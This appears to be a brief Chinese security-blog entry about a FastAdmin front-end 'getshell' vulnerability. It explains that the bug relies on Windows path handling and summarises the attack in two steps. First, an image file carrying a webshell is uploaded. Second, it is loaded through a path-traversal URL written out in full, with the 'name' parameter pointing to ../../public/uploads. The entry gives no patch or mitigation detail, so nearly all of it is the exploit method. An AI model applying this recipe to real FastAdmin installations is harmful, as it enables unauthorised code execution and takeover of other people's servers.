Quan


WEB安全 内网安全 终端对抗 威胁情报
威胁情报
fastadmin前台getshell漏洞

Windows下可用,Linux下不太行。原理就是因为Windows那倒了血霉的路径斜杠问题。
总结:上传图片马,然后该路径包含
http://www.demo.com/index.php/index/user/_empty?name=../../public/uploads/xxxxx/xxxxx.jpg


https://mp.weixin.qq.com/s/02OFRMQH1nwFIP1dSQC9gg